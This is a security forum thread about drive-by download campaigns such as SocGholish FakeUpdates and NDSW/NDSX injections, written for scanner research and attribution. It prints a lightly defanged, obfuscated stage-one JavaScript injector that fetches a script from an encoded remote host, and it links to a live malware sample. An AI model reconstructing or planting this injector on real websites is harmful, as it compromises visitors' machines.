Drive-By Download attacks

[imlordofthering]

Hey all - I am doing some research on some groups that are focused on drive-by download attacks. Scenarios in which a user visits a trusted domain and gets a popup or notification that tells them things like "Your computer is infected" or "Your browser version is out of date".

I have three questions that I hope the community can help me with:

1.) I've seen some attacks where a user will enable notifications for a specific website and then will get very scary Windows Notifications (example) -- what is the mechanism that pushes this notification through Chrome and into the Windows Notification Center?  I am assuming it is javascript but I'd love some technical resources to explain how to emulate that attack.

2.) I'm tracking a few SocGholish 'FakeUpdates' attacks and if anyone sees instances of this in the wild I would love to see them. I've got a scanner (github link) that I am extending from another researcher to find these and decode them on my own and any help would be greatly appreciated!

3.) How are these trusted sites getting these malicious javascript stagers on them? Supply chain compromise? Bad WordPress plugins? Credential theft? I don't know how to answer this on my own and some insight would be helpful.

[ChickenKing]

1.) Read up on Cryxos trojans. These are pretty much exactly what you're describing, and yes they do typically use javascript. 

2.) https://malshare.com/sample.php?action=detail&hash=fe4f25543277d59a8be80dca68c50d09e695ad60d732ec4e7a8086bddf77cb5b here is a sample of SocGholish I found myself personally. This is malware so please use caution if you download it.

3.) Multiple ways. wordpress plugins are often a big culprit. There was a massive js injection campaign earlier this year going by NDSW or NDSX (variable names used in the js) that might help give you some insights. Read more here https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html

[imlordofthering]

8 minutes ago, ChickenKing said:

1.) Read up on Cryxos trojans. These are pretty much exactly what you're describing, and yes they do typically use javascript. 

2.) https://malshare.com/sample.php?action=detail&hash=fe4f25543277d59a8be80dca68c50d09e695ad60d732ec4e7a8086bddf77cb5b here is a sample of SocGholish I found myself personally. This is malware so please use caution if you download it.

3.) Multiple ways. wordpress plugins are often a big culprit. There was a massive js injection campaign earlier this year going by NDSW or NDSX (variable names used in the js) that might help give you some insights. Read more here https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html

Thanks for sharing. What I'm looking for in particular with the SocGholish right now is not their payload, but the element on the webpage itself that triggers the download.

For example (intentionally broken for safety), here is one I found in the wild that the scanner I'm working with can pick up with regex:

(funcXXXXXXtion () { var oi = document.referrer; var fb = window.location.href; var gy = navigator.userAgent; var sq = new RegExp(bz('l:b/x/x(t[v^b/z]i+d)c/t')); if (!oi || fb.match(sq)[1] == oi.match(sq)[1] || gy.indexOf(bz('rWrienudoolwisj')) == -1 || window.localStorage[bz('z_q_w_tuutqmhai')]) { return; } var cx = bz('fsycdrkizpqtt'); var fe = document.createElement(cx); fe.async = true; fe.<XXXXXsrc> = bz('ahststqpqsk:s/z/kakucchtjirosnx.fwqofnwdlewrlwrobmdacntqpuniglftksu.pcmonmo/yrheapsosrktv?wrn=pdejs1miiZojuctzdNizogkxtMqjoUj1jNp2jYtxgNajpgxznMyDyIv2jMvyaZojvaxWzQa9qMgjvYd5i'); var sg = document.getElementsByTagName(cx)[0]; sg.parentNode.insertBefore(fe, sg); function bz(ft) { var sw = ''; for (var vn = 0; vn < ft.length; vn++) { if (vn % 2) { sw += ft[vn]; } } return sw; }a }());

My goal is to extend my scanner to be able to pick up more instances of compromised sites and to identify if there are other variations of this stage1 script to look for.

In regards to your point three - I am actually working on deciphering what must be a variant of that exact campaign that I found in the wild this week - the code instead begins with 

if (ndsj === undefined) {

but matches all of the TTPs in that article. Thanks for helping me attribute that one!

[ChickenKing]

26 minutes ago, imlordofthering said:

Thanks for sharing. What I'm looking for in particular with the SocGholish right now is not their payload, but the element on the webpage itself that triggers the download.
 

this really depends on the site. From my experience SocGholish does not use compromised sites but instead uses typosquatting or fake sites for legit software. In those cases (which are the majority) it's just simply malware hosted on a site. nothing special 

[malware_marty]

So from what i could remember about socGolish, in the past they embed the base64 encoded zip archive within the lure page itself. after some changes in august of 2022 they started using a second stage of JS that was delivered from an external site after the user interacted with the page. this would then deliver the zip archive.

i havent seen socgholish in a while but if i come across any campaigns soon ill share what i find

[Chauke]

1. https://developer.mozilla.org/en-US/docs/Web/API/Notifications_API/Using_the_Notifications_API

2. That is what i have seen a lot with those fake Notifications. https://github.com/mrd0x/BITB

3. The most classic form of those notifications are stupid News Pages that make a buck with advertisement. The ad company selling the ads do not give a damn about the quality of the ads. That's how phishing pages land there.